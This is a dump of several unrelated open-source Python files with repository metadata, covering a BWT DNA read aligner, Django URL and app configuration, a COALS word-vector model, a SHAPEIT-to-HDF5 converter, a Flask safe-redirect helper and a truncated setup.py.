endIndex=ReadSaveIndex*numOfCharPerLineBWT*numOfLinesSkippedReadSave+\
(numOfCharPerLineBWT-1)
firstIndex,lastIndex,numOfOccurances=OccuranceFetch(startIndex,endIndex,character)
# print "ReadMatrixSave[",ReadSaveIndex,"]",ReadMatrixSave[ReadSaveIndex]
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1-numOfOccurances
else:
startIndex= ReadSaveIndex*numOfCharPerLineBWT*numOfLinesSkippedReadSave+\
numOfCharPerLineBWT
endIndex=rowIndex
firstIndex,lastIndex,numOfOccurances=OccuranceFetch(startIndex,endIndex,character)
# print "ReadMatrixSave[",ReadSaveIndex,"]",ReadMatrixSave[ReadSaveIndex]
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1+numOfOccurances
#--------------------------------------------------------------------------------------
#Returns the row Indices of the band of the corresponding characters in
#first column
def FindBand(character, minRank, maxRank):
    """Return the (start, end) row indices, in the sorted first BWT column,
    of the band covering ranks minRank..maxRank of `character`."""
    base = firstColStartIndex[mapDict[character]]
    start = base + minRank
    end = start + (maxRank - minRank)
    return start, end
#--------------------------------------------------------------------------------------
# This function returns the a list of band objects which are the
# valid sub-bands of the given band
def FindSubBands(bandObj,seqChar,maxMismatches):
    """Return the valid sub-bands of `bandObj` for one backward-search step.

    For each alphabet character, locates its occurrences inside the current
    band of the BWT last column, maps them to a first-column band via
    rank queries, and keeps the sub-band only if its accumulated mismatch
    count (incremented when the character differs from the expected read
    character `seqChar`) does not exceed `maxMismatches`.
    """
    bandReturnList=[]
    indexOfSeqChar0=None
    #print "Inside Find Subbands............"
    for char in ['A','C','G','T']:
        # print "--------------Finding the",char,"-subband of",bandObj.char," ------------------"
        # print "bandObj.startIndex=",bandObj.startIndex,"bandObj.endIndex=",bandObj.endIndex
        # First/last row of `char` within the current band (or -1 if absent).
        firstIndex,lastIndex,numOfOccurances =OccuranceFetch(bandObj.startIndex,bandObj.endIndex,char)
        indexOfSeqChar0=firstIndex
        indexOfSeqChar1=lastIndex
        if (indexOfSeqChar0== -1):
            # `char` does not occur in the band: no sub-band to produce.
            continue
        else:
            #for each if the entry in indexOfSeqChar obtain rank
            # print "The ranks of ",char," with the rowIndex",firstIndex," and ",lastIndex
            minRank=RankQuery(char,indexOfSeqChar0)
            maxRank=RankQuery(char,indexOfSeqChar1)
            #print "minRank=",minRank,"maxRank=",maxRank
            startBandIndex, endBandIndex = FindBand(char,minRank,maxRank)
            # A mismatch is charged when the band character differs from the
            # read character being matched at this step.
            totBandMismatches = bandObj.mismatches + (char!=seqChar)
            if totBandMismatches<=maxMismatches:
                newBandObj=bd.Band(char,startBandIndex,endBandIndex,totBandMismatches)
                bandReturnList.append(newBandObj)
            else:
                continue
    return bandReturnList
#--------------------------------------------------------------------------------------
# find the position in the reference chromosome
def FindRefPosition(startRowIndex, endRowIndex):
    """Map a band of BWT row indices back to reference positions.

    The position table is sharded into files named
    'chrMapFragmentPart<k>', each holding 100000 positions (one per line).
    Returns the list of position strings for rows
    startRowIndex..endRowIndex inclusive.

    Fixes two defects of the original:
    * a band spanning two fragment files silently returned [] — all
      fragments in the range are now read and concatenated;
    * the fragment file handle was never closed — now closed via `with`.
    Uses `//` so the arithmetic is correct under both Python 2 and 3.
    """
    chrName = "chrMapFragmentPart"
    linesPerPart = 100000
    partNumStart = startRowIndex // linesPerPart
    partNumEnd = endRowIndex // linesPerPart
    position = []
    for partNum in range(partNumStart, partNumEnd + 1):
        fileName = chrName + str(partNum)
        with open(fileName) as fhand:
            # trailing newline produces one empty tail element -> drop it
            bwtref = fhand.read().split("\n")[:-1]
        # Slice bounds local to this fragment.
        lo = startRowIndex - partNum * linesPerPart if partNum == partNumStart else 0
        hi = endRowIndex - partNum * linesPerPart if partNum == partNumEnd else linesPerPart - 1
        position.extend(bwtref[lo:hi + 1])
    return position
def FindRefPosition1(startRowIndex, endRowIndex):
    """Map BWT rows startRowIndex..endRowIndex (inclusive) to reference
    positions by slicing the single (unsharded) position file
    `bwtRefFileName`; returns them as a 1-D int numpy array."""
    with open(bwtRefFileName) as handle:
        lines = handle.read().split("\n")
    band = lines[startRowIndex:endRowIndex + 1]
    return np.asarray(band).flatten().astype(int)
#--------------------------------------------------------------------------------------
# String Matching Algorithm
# Takes the string input and outputs the index in the original chromosome
def PatternApproxMatch(inpString,maxMismatches=0):
    """Backward-search `inpString` against the BWT index, allowing up to
    `maxMismatches` mismatches.

    Returns a dict {reference_position: confidence} where confidence is
    1.0 for exact matches and 0.5 for matches with >=1 mismatch.
    """
    global firstColStartIndex
    # Cumulative character counts give the start row of each character's
    # block in the sorted first column.
    firstColStartIndex=(np.insert(np.cumsum(totCountEach),0,0)).astype(int)
    #print "firstColStartIndex=",firstColStartIndex
    # Initializations: seed one band per alphabet character for the LAST
    # character of the query (backward search runs right to left).
    seqChar=inpString[-1]
    bandList=[]
    for char in ['A','C','G','T']:
        minRank=0
        maxRank=totCountEach[mapDict[char]]-1
        startBandIndex, endBandIndex = FindBand(char,minRank,maxRank)
        # print "startBandIndex=",startBandIndex, "endBandIndex=", endBandIndex
        bandObj=bd.Band(char,startBandIndex,endBandIndex,int(char!=seqChar))
        if bandObj.mismatches<=maxMismatches:
            bandList.append(bandObj)
    # print "bandList=",bandList
    # Find the matching bands: extend every surviving band by one character
    # per iteration, replacing it with its valid sub-bands.
    for i in range(1,len(inpString)):
        seqChar=inpString[-1-i]
        # print i,"-th character",seqChar
        numOfBandObj=len(bandList)
        #print "numOfBandObj",numOfBandObj
        bandObjCount=0
        while (bandObjCount <numOfBandObj):
            # print "inside second alphabet while loop"
            # Pop only the bands from the previous generation; their
            # sub-bands are appended at the tail for the next round.
            bandObj=bandList.pop(0)
            bandList.extend(FindSubBands(bandObj,seqChar,maxMismatches))
            bandObjCount=bandObjCount+1
        # print bandList
        #x=raw_input("hit enter when done.....................................................")
    #Find the reference indices
    #x=raw_input("done bandlist... check bandlist")
    #print "bandlist=",bandList
    matchPositions=[]
    confidenceLevel=[]
    for i in range(len(bandList)):
        # Confidence weighting: exact match -> 1, any mismatches -> 0.5.
        numMisMatches=(np.ones(bandList[i].endIndex-bandList[i].startIndex+1)*bandList[i].mismatches).astype(float)
        numMisMatches[numMisMatches>0]=0.5
        numMisMatches[numMisMatches==0]=1
        posi=(np.asarray(FindRefPosition(bandList[i].startIndex,bandList[i].endIndex)).flatten()).astype(int)
        matchPositions.extend(posi)
        confidenceLevel.extend(numMisMatches)
    # positions=(np.asarray(matchPositions)).astype(int)
    # NOTE(review): dict() keeps only one confidence per position; a
    # position reached both exactly and with mismatches keeps the last
    # value seen — presumably intentional, verify.
    readMatchPositions=dict(zip(matchPositions,confidenceLevel))
    #print readMatchPositions
    return readMatchPositions
#--------------------------------------------------------------------------------------
# Associates each read with the Red and Green Exons depending on the
# matched position
def BinningReads(readMatchPositions, currentRead):
    """Accumulate each matched position's confidence into the first exon
    bin (from `exonsBinPositions`) that fully contains the read."""
    readLen = len(currentRead)
    for position, confidence in readMatchPositions.items():
        for binStart, binEnd in exonsBinPositions.items():
            if binStart <= position and position + readLen <= binEnd:
                exonBinReadsCount[binStart] += confidence
                break  # credit at most one bin per match
#--------------------------------------------------------------------------------------
# Driver: load the BWT index, then match every read and tally exon-bin hits.
# NOTE: this file is Python 2 (`print` statement below).
ReadBWT(bwtLastColFileName,bwtRefFileName)
# One counter per exon bin, keyed by the bin's start position.
newkeys=list(exonsBinPositions.keys())
exonBinReadsCount={key:0 for key in newkeys}
counter=0
with open(readsFileName) as readsFileHand:
    # Stream the reads one line at a time to keep memory flat.
    for currentRead in readsFileHand:
        # Strip ambiguous bases and the trailing newline before matching.
        currentRead=currentRead.replace("N","")
        currentRead=currentRead.replace("\n","")
        # print "Current Read:",currentRead
        #print "Read count:",counter
        # currentRead="ATTCTACAAATACCCCTCCAGTATATTTCTTTCCCTTTTTTTTGAAGTCTCAGTCTGCCACCCAGGCTGGAGTGCAGTGGTGTGATTTTGGCTCACTGCA"
        readMatchPositions=PatternApproxMatch(currentRead,numOfAllowedMismatches)
        #print "position=",readMatchPositions
        BinningReads(readMatchPositions,currentRead)
        print exonBinReadsCount
        counter=counter+1
#to determine the probability of colour Blindness
totalCount=0
for i in exonBinReadsCount.values():
    totalCount=totalCount+i
#--------------------------------------------------------------------------
#Version 1 : Base version
#Version 2 : Changed fhand= open(readsFileName) to with open(readsFileName)
# : to read the file line by line, that is one read at a time
#Version 3: changed ReadBWT function
# : Added ACGTFetch function
# : changed rank query
# : added accessing file fragments for bwtrefcol
# : using bwtcol directly
|
[
"[email protected]"
] | |
e8760e831ddd791fb10d86687e57cfa46bf7bee3
|
b0a83dd64b74b4f08c7185db03217f7d4c5c8e74
|
/homemate/urls.py
|
3b62169be63523d2e39cc890becaf5fe85dccae5
|
[] |
no_license
|
alice-project/homemate
|
20719307d4238a7a61d9486d495dac41cdf8fe99
|
19783ed2a09581f7c302e60ab0326e8c5b32152b
|
refs/heads/master
| 2020-03-17T10:52:59.833806 | 2018-11-23T14:49:40 | 2018-11-23T14:49:40 | 133,529,107 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 893 |
py
|
"""homemate URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from . import views
# URL routing table for the homemate project.
urlpatterns = [
    url(r'^admin/', admin.site.urls),                     # Django admin site
    url(r'^$', views.index, name='index'),                # site landing page
    url(r'^mediacenter/', include('mediacenter.urls')),   # delegate to app URLconf
]
|
[
"[email protected]"
] | |
8a83c4d386fc442c7b152dc26c9c901fd73eb0a9
|
8c777a9fc49358591379ea89bbfe578262e2019c
|
/mrworldwide/search_countries/apps.py
|
f60e1d49e66c6bcd92fc9ee02508a9d65d2cb104
|
[] |
no_license
|
IsmaVerde/PI-Practicas
|
b6b564be473732626921f678aedd4296be3222d2
|
cce47fee2ca817e42b8ed73cb8d3aa400946ba2c
|
refs/heads/main
| 2023-05-30T17:05:36.705360 | 2021-06-18T16:49:18 | 2021-06-18T16:49:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 106 |
py
|
from django.apps import AppConfig
class SearchCountriesConfig(AppConfig):
    """Django application configuration for the `search_countries` app."""
    # Dotted-path label Django uses to register the app.
    name = 'search_countries'
|
[
"[email protected]"
] | |
777bcb652755bae1483e56e0a6d9753b1cd06756
|
ba1baa3eeaa9df83762125dce4e77e3104b22306
|
/coals.py
|
7c7a93b031f46be6f78d33882cbb4bb554afc653
|
[] |
no_license
|
chien1000/word-vectors-comparison
|
d75d969d8a9ec5d859a63de5b54576bb770ae5bc
|
647680fcc8a5ff0535e8d3d04ee873bfb2ca3b5b
|
refs/heads/master
| 2021-03-24T09:24:45.312315 | 2019-03-16T09:12:03 | 2019-03-16T09:12:03 | 119,685,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,853 |
py
|
from collections import defaultdict, Counter
import six
from six import string_types
from datetime import datetime
import os
import pickle
from base import get_vocabulary, MODEL_PATH
from hal import HalWordVectorizer, _make_int_array
from corpus import LineCorpus
from stop_words import ENGLISH_CLOSED_CLASS_WORDS
from exceptions import *
import numbers
import numpy as np
import scipy.sparse as sp
from scipy.spatial.distance import cdist
from sklearn.decomposition import TruncatedSVD
from gensim import matutils
class CoalsWordVectorizer(HalWordVectorizer):
    """COALS word vectorizer: builds a windowed co-occurrence matrix,
    converts counts to word-pair correlations (negatives clamped to 0,
    square-rooted), and optionally reduces dimensionality with SVD."""
    def __init__(self, window_size = 4, max_features=None, svd_dim=None,
                 min_count=None, dtype=np.int64):
        """
        window_size  -- context window radius (weights decay with distance)
        max_features -- keep only the k most frequent context columns
        svd_dim      -- if set, reduce vectors to this dimension via SVD
        min_count    -- minimum token frequency for vocabulary inclusion
        dtype        -- integer dtype of the raw count matrix
        """
        self.window_size = window_size
        self.max_features = max_features
        self.svd_dim = svd_dim
        if max_features is not None:
            if (not isinstance(max_features, numbers.Integral) or
                    max_features <= 0):
                raise ValueError(
                    "max_features=%r, neither a positive integer nor None"
                    % max_features)
        self.min_count = min_count or 0
        if min_count is not None:
            if not isinstance(min_count, numbers.Integral):
                raise ValueError(
                    "min_count=%r, neither a integer nor None"
                    % min_count)
        # Closed-class (function) words are excluded from the vocabulary.
        self.stop_words = set(ENGLISH_CLOSED_CLASS_WORDS)
        # self.stop_words = None
        self.dtype = dtype
    def get_dim(self):
        """Return the dimensionality of the final word vectors."""
        if self.svd_dim is not None:
            return self.svd_dim
        else:
            return self.max_features
    def get_name(self):
        """Short model-family name used in file naming."""
        return 'COALS'
    def get_mid(self):
        """Model identifier encoding the main hyperparameters."""
        mid = '{}_d{}_{}_window_{}'.format(self.get_name(), self.svd_dim, self.max_features, self.window_size)
        return mid
    def _count_cooccurence(self, docs):
        """Create sparse feature matrix

        Scans each document with a +/- window_size window; a context word at
        distance d contributes weight (window_size - d + 1).  Triplets are
        flushed into the CSC accumulator every 10000 docs to bound memory.
        """
        vocabulary = self.vocabulary
        row = _make_int_array()
        col = _make_int_array()
        values = _make_int_array()
        cooccurence_matrix = sp.csc_matrix((len(vocabulary), len(vocabulary)), dtype=self.dtype)
        window_size = self.window_size
        for doc_id, doc in enumerate(docs):
            doc = [t for t in doc.split()]
            doc_length = len(doc)
            for i, feature in enumerate(doc):
                try:
                    feature_idx = vocabulary[feature]
                    for j in range(max(i - window_size, 0), min(i + window_size, doc_length-1)+1):
                        if j == i:
                            continue
                        context_word = doc[j]
                        context_idx = vocabulary[context_word]
                        row.append(feature_idx)
                        col.append(context_idx)
                        # Linear distance-decay weight: adjacent words get
                        # window_size, the farthest in-window word gets 1.
                        diff = abs(j-i)-1
                        values.append(window_size-diff)
                except KeyError:
                    # Ignore out-of-vocabulary items
                    continue
            batch_size = 10000
            if doc_id % batch_size == 0:
                # Flush accumulated triplets into the sparse matrix.
                values = np.frombuffer(values, dtype=np.intc)
                batch_matrix = sp.csc_matrix((values, (row, col)), shape=(len(vocabulary),
                    len(vocabulary)), dtype=self.dtype)
                cooccurence_matrix += batch_matrix
                # reset
                row = _make_int_array()
                col = _make_int_array()
                values = _make_int_array()
                print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
                print('processed #{} docs'.format(doc_id+1))
        if len(values) > 0:
            # Flush the final partial batch.
            values = np.frombuffer(values, dtype=np.intc)
            batch_matrix = sp.csc_matrix((values, (row, col)), shape=(len(vocabulary),
                len(vocabulary)), dtype=self.dtype)
            cooccurence_matrix += batch_matrix
            print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
            print('processed #{} docs'.format(doc_id+1))
        # cooccurence_matrix = cooccurence_matrix.tocsc()
        # print(cooccurence_matrix.toarray())
        return cooccurence_matrix
    def fit_word_vectors(self, corpus_path):
        """Fit COALS vectors on the corpus at `corpus_path`.

        Loads a cached co-occurrence matrix + vocabulary if present,
        otherwise builds and caches them; then normalizes the counts to
        correlations and (optionally) applies truncated SVD.
        Returns self.
        """
        corpus_name = os.path.splitext(os.path.basename(corpus_path))[0]
        # Cache file names encode model/corpus/hyperparameters.
        save_com_path = '{}_{}_mc{}_w{}_com.npz'.format(self.get_name(), corpus_name, self.min_count, self.window_size)
        save_com_path = os.path.join(MODEL_PATH, save_com_path)
        save_ind2word_path = '{}_{}_mc{}_w{}_ind2word.bin'.format(self.get_name(), corpus_name, self.min_count, self.window_size)
        save_ind2word_path = os.path.join(MODEL_PATH, save_ind2word_path)
        try:
            cooccurence_matrix = sp.load_npz(save_com_path)
            with open(save_ind2word_path, 'rb') as fin:
                self.ind2word = pickle.load(fin)
            self.vocabulary = {w:i for i, w in enumerate(self.ind2word)}
            print('load existed cooccurence_matrix and vocab')
            print('vocabulary size: {}'.format(len(self.vocabulary)))
        except Exception as e:
            # Cache miss (or unreadable cache): build from scratch.
            docs = LineCorpus(corpus_path)
            self.ind2word, self.vocabulary = get_vocabulary(docs,
                self.min_count, sort_by_frequency=True)
            #remove stopwords:
            self.ind2word = [w for w in self.ind2word if w not in self.stop_words]
            self.vocabulary = {w:i for i, w in enumerate(self.ind2word)}
            print('vocabulary size: {}'.format(len(self.vocabulary)))
            cooccurence_matrix = self._count_cooccurence(docs)
            sp.save_npz(save_com_path, cooccurence_matrix)
            with open(save_ind2word_path, 'wb') as fout:
                pickle.dump(self.ind2word, fout)
        if self.max_features: #discard all but the k columns reflecting the most common open-class words
            k = self.max_features
            #vocabulary has been ordered by freqeuncy decreasingly
            cooccurence_matrix = cooccurence_matrix[:, :k]
            #reserved features
            self.reserved_features = self.ind2word[:k]
        #normalize
        ##convert counts to word pair correlations
        t_sum = cooccurence_matrix.sum()
        row_sum = cooccurence_matrix.sum(axis = 1)
        col_sum = cooccurence_matrix.sum(axis = 0)
        cooccurence_matrix = cooccurence_matrix.tocoo()
        # Numerator/denominator pieces of the correlation are assembled as
        # sparse matrices aligned with the nonzero entries (COO row/col).
        multi_rsum_csum_value = np.multiply(col_sum.take(cooccurence_matrix.col),
            row_sum.take(cooccurence_matrix.row)).A.squeeze()
        assert (multi_rsum_csum_value >=0).all() #check overflow
        multi_rsum_csum = sp.coo_matrix((multi_rsum_csum_value,
            (cooccurence_matrix.row, cooccurence_matrix.col)))
        deno = t_sum*cooccurence_matrix.tocsr() - multi_rsum_csum.tocsr()
        row_d = np.multiply(np.sqrt(row_sum) , np.sqrt((t_sum - row_sum)))
        col_d = np.multiply(np.sqrt(col_sum ), np.sqrt((t_sum - col_sum)))
        assert (row_d >=0).all() #check overflow
        assert (col_d >=0).all() #check overflow
        col_d_target_value = col_d.take(cooccurence_matrix.col).A.squeeze()
        col_d_target = sp.coo_matrix((col_d_target_value,
            (cooccurence_matrix.row, cooccurence_matrix.col)))
        # Invert the stored data so multiply() performs the division.
        col_d_target.data = 1 / col_d_target.data
        row_d_target_value = row_d.take(cooccurence_matrix.row).A.squeeze()
        row_d_target = sp.coo_matrix((row_d_target_value,
            (cooccurence_matrix.row, cooccurence_matrix.col)))
        row_d_target.data = 1 / row_d_target.data
        cooccurence_matrix = deno.multiply(col_d_target.tocsr()).multiply(row_d_target.tocsr())
        ##set negative values to 0
        cooccurence_matrix[cooccurence_matrix < 0] = 0
        ##take square roots
        cooccurence_matrix = np.sqrt(cooccurence_matrix)
        #apply svd
        if self.svd_dim:
            #TODO : remove less frequent rows to accelerate computing speed of svd
            cooccurence_matrix = cooccurence_matrix.asfptype()
            svd = TruncatedSVD(self.svd_dim, algorithm = 'arpack')
            cooccurence_matrix = svd.fit_transform(cooccurence_matrix) # vocab_len * vector_dim
            self.svd = svd
        self.word_vectors = cooccurence_matrix
        self.init_sims()
        return self
    def init_sims(self, replace=False):
        # the COALS transform already normalizes the vectors, so the
        # "normalized" copy is simply an alias of word_vectors
        if getattr(self, 'word_vectors_norm', None) is None or replace:
            self.word_vectors_norm = self.word_vectors
    def get_similarity(self, term1, term2):
        """Pearson-correlation similarity between two terms' vectors."""
        v1 = self.get_word_vector(term1)
        v2 = self.get_word_vector(term2)
        sim = np.corrcoef(v1, v2)[0, 1]
        return sim
    def one2many_similarity(self, one_v, many_v, normalized=True):
        """Correlation similarity of one vector against many; rows of
        `many_v` with zero variance get similarity 0 (corrcoef undefined)."""
        one_v = one_v.reshape(1, -1) # 1*dim
        many_v = many_v.reshape(-1, self.get_dim()) # n*dim
        # NOTE!
        # there are some zero vectors with std = 0, causing errors(ZeroDivision) when calculating corrcoef!
        std = np.std(many_v, axis=1)
        nonzero_mask = std != 0
        n_vectors = many_v.shape[0]
        sims = np.zeros(n_vectors)
        vectors_with_std = many_v[nonzero_mask,]
        # sims_with_std = np.apply_along_axis(lambda x: np.corrcoef(x,mean)[0,1], 1,vectors_with_std)
        sims_with_std = (1 - cdist(one_v, vectors_with_std, metric='correlation')).squeeze() #faster!!
        sims[nonzero_mask] = sims_with_std
        return sims
|
[
"[email protected]"
] | |
d76c17214f347a505da9a63ba79dea1cba99813d
|
ee69a67e61ca7b51a57e85255d0387099a5eea4c
|
/scripts/shapeit_2_hdf5.py
|
7773d1a09625662411768d7d2e296f3de959f068
|
[
"MIT"
] |
permissive
|
melcampos/snakeit
|
95a6e742daa15771b576e129ed89bbeb8932e513
|
e2fc32a33989cad28761e2321825628dc8439925
|
refs/heads/master
| 2020-07-09T03:16:30.961516 | 2017-07-25T10:43:59 | 2017-07-25T10:43:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,481 |
py
|
#! /usr/bin/python
__author__ = 'Nicholas Harding'
import numpy as np
import h5py
import os.path
import gzip
from itertools import islice
# Convert SHAPEIT phased haplotypes (.samples + .haps, gzipped) into an HDF5
# file laid out as /<chrom>/{samples, variants/{POS,ID,REF,ALT}, calldata/genotype}.
# NOTE(review): `snakemake` is injected by the Snakemake runtime, not imported.
if os.path.isfile(snakemake.output.hdf5):
    raise FileExistsError("outfile already exists")
else:
    h5file = h5py.File(snakemake.output.hdf5, mode="w")
    chrom = h5file.create_group(snakemake.wildcards.chrom)
    # Create the groups
    grp_calldata = chrom.create_group("calldata")
    grp_variants = chrom.create_group("variants")
    # read samples file: two header lines, then one line per sample;
    # the sample name is the second whitespace-separated field.
    fh_samples = gzip.open(snakemake.input.samples, 'rb')
    samples_header = fh_samples.readline()
    samples_desc = fh_samples.readline()
    sample_info = [s.decode() for s in fh_samples.readlines()]
    sample_names = np.array([s.rstrip().split(' ')
                             for s in sample_info], dtype="|S8")[:, 1]
    n_sam = len(sample_names)
    # count lines
    number_sites = snakemake.params.max_sites
    print("Max sites set at {0} snps.".format(number_sites))
    # create objects: datasets start empty and are grown chunk by chunk
    # up to the max_sites cap via resize() below.
    samples = chrom.create_dataset('samples', data=sample_names)
    position = grp_variants.create_dataset('POS', (0, ),
                                           maxshape=(number_sites, ),
                                           dtype="int",
                                           compression="gzip",
                                           compression_opts=1)
    identify = grp_variants.create_dataset('ID', (0, ),
                                           maxshape=(number_sites, ),
                                           dtype="S8",
                                           compression="gzip",
                                           compression_opts=1)
    reference = grp_variants.create_dataset('REF', (0, ),
                                            maxshape=(number_sites, ),
                                            dtype="S1",
                                            compression="gzip",
                                            compression_opts=1)
    alternate = grp_variants.create_dataset('ALT', (0, ),
                                            maxshape=(number_sites, ),
                                            dtype="S1",
                                            compression="gzip",
                                            compression_opts=1)
    genotypes = grp_calldata.create_dataset('genotype', (0, n_sam, 2),
                                            maxshape=(number_sites, n_sam, 2),
                                            dtype="int",
                                            compression="gzip",
                                            compression_opts=1)
    fh_haplotypes = gzip.open(snakemake.input.haplotypes, 'rb')
    n = 0  # number of variant rows written so far
    print("loading haplotypes...")
    while True:
        print(n, "read...")
        # Read up to chunk_size lines at a time to bound memory.
        chunk = list(islice(fh_haplotypes, snakemake.params.chunk_size))
        if not chunk:
            break
        print("chunk has", len(chunk), "lines")
        # .haps columns: chrom, id, pos, ref, alt, then 2 alleles per sample.
        as_np = np.array([line.rstrip().split(b' ') for line in chunk])
        print("chunk read and converted to numpy:", as_np.shape)
        # Grow each dataset and fill the newly added tail (rows n..end).
        position.resize(as_np.shape[0] + position.shape[0], axis=0)
        position[n:] = as_np[:, 2].astype('int')
        identify.resize(as_np.shape[0] + identify.shape[0], axis=0)
        identify[n:] = as_np[:, 1]
        alternate.resize(as_np.shape[0] + alternate.shape[0], axis=0)
        alternate[n:] = as_np[:, 4]
        reference.resize(as_np.shape[0] + reference.shape[0], axis=0)
        reference[n:] = as_np[:, 3]
        genotypes.resize(as_np.shape[0] + genotypes.shape[0], axis=0)
        genotypes[n:] = as_np[:, 5:].astype('int').reshape((-1, n_sam, 2))
        n += len(chunk)
    h5file.close()
|
[
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801
|
a070182e6443995031340802e74d1e65a85bdca3
|
/bluelog/utils.py
|
4975d944d9c5eebe4486d47ab3fea78ee7fa681c
|
[] |
no_license
|
huazhicai/bluelog
|
f86a042a5f3ada46515920c45a0b1452a40d4ad9
|
c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01
|
refs/heads/master
| 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
    """Return True if *target* resolves to this site's own host over
    http(s), i.e. it is safe to redirect to (guards against open redirects)."""
    host_url = request.host_url
    current = urlparse(host_url)
    candidate = urlparse(urljoin(host_url, target))
    same_host = current.netloc == candidate.netloc
    return candidate.scheme in ('http', 'https') and same_host
def redirect_back(default='blog.index', **kwargs):
    """Redirect to the 'next' query parameter or the referrer, whichever is
    present and safe first; otherwise fall back to the *default* endpoint
    (kwargs are forwarded to url_for)."""
    candidates = (request.args.get('next'), request.referrer)
    for target in candidates:
        if target and is_safe_url(target):
            return redirect(target)
    return redirect(url_for(default, **kwargs))
|
[
"[email protected]"
] | |
6bccc2ddc4d09d7ad97468de9e225678e1b8f627
|
7c91ff172ba9898386cc84f3d0384ad0f12fc118
|
/ex_morita/sort/bubble_sort.py
|
73afe7fe46cd96bde16690a1dea53eb8bf61cfb3
|
[] |
no_license
|
HokutoMorita/algorithm
|
cfec809df236b3fb8dd607812ec21110bca0df48
|
285c24fde771be3e1e81fb1d7ad1e14bfc83c55d
|
refs/heads/main
| 2023-01-14T18:05:33.041621 | 2020-11-15T05:52:01 | 2020-11-15T05:52:01 | 311,011,103 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 965 |
py
|
from typing import List
"""
Bubble sortのオーダー数
- Average: O(n**2)
- Best: O(n)
- Worst: O(n**2)
"""
def bubble_sort(numbers: List[int]) -> List[int]:
    """Sort *numbers* in place in ascending order with bubble sort and
    return the same list.

    Average/Worst: O(n**2).  Best: O(n) — the early-exit check below makes
    the O(n) best case the module docstring advertises actually hold
    (the original always ran the full O(n**2) passes).
    """
    length = len(numbers)
    for i in range(length):
        swapped = False
        # After pass i, the i largest elements are settled at the tail,
        # so each pass can stop one element earlier.
        for j in range(length - 1 - i):
            if numbers[j] > numbers[j + 1]:
                # Idiomatic tuple swap instead of two temp variables.
                numbers[j], numbers[j + 1] = numbers[j + 1], numbers[j]
                swapped = True
        if not swapped:
            # No swaps in a full pass: list already sorted (best case O(n)).
            break
    return numbers
if __name__=='__main__':
    # Smoke test on a fixed list with a known order.
    nums = [2, 5, 1, 8, 7, 3]
    result = bubble_sort(nums)
    print(result)
    # And on ten random values in [0, 1000].
    import random
    nums_random = [random.randint(0, 1000) for i in range(10)]
    print(bubble_sort(nums_random))
|
[
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe
|
d4fe66ef7b5bc1745aeb4054b30575fb25a053f4
|
/setup.py
|
d838e226a7de7b9cd782061fb6f64b3134bc06cc
|
[
"Apache-2.0"
] |
permissive
|
jay-johnson/antinex-client
|
796c753bc9df8498f25dca994920b26d8828a940
|
76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba
|
refs/heads/master
| 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,053 |
py
|
import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
    """setuptools `test` command that delegates to pytest
    (run as `python setup.py test --pytest-args="..."`)."""
    # Extra CLI option forwarded verbatim to pytest.
    user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
    def initialize_options(self):
        """Set the default (empty) pytest argument string."""
        TestCommand.initialize_options(self)
        self.pytest_args = ''
    def run_tests(self):
        """Run pytest with the collected args and exit with its status."""
        import shlex
        # import here, cause outside the eggs aren't loaded
        import pytest
        errno = pytest.main(shlex.split(self.pytest_args))
        sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
# Read the long description for PyPI. Use a context manager so the file
# handle is closed (the original `open(...).read()` leaked it).
with open('README.rst') as readme_file:
    long_description = readme_file.read()
# Run the build from the directory containing setup.py regardless of cwd.
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
# Runtime/development dependencies installed with the package.
install_requires = [
    "colorlog",
    "coverage",
    "flake8",
    "matplotlib",
    "numpy",
    "pandas",
    "pep8",
    "pipenv",
    "pycodestyle",
    "pylint",
    "recommonmark",
    "requests",
    "seaborn",
    "sphinx",
    "sphinx-autobuild",
    "sphinx_rtd_theme",
    "spylunking",
    "tox",
    "tqdm",
    "unittest2",
    "mock"
]
if sys.version_info < (3, 5):
    warnings.warn(
        "Less than Python 3.5 is not supported.",
        DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
    name="antinex-client",
    cmdclass={"test": PyTest},
    version="1.3.6",
    description=("AntiNex Python client"),
    long_description_content_type='text/x-rst',
    long_description=long_description,
    author="Jay Johnson",
    author_email="jay.p.h.johnson@gmail.com",
    url="https://github.com/jay-johnson/antinex-client",
    packages=[
        "antinex_client",
        "antinex_client.scripts",
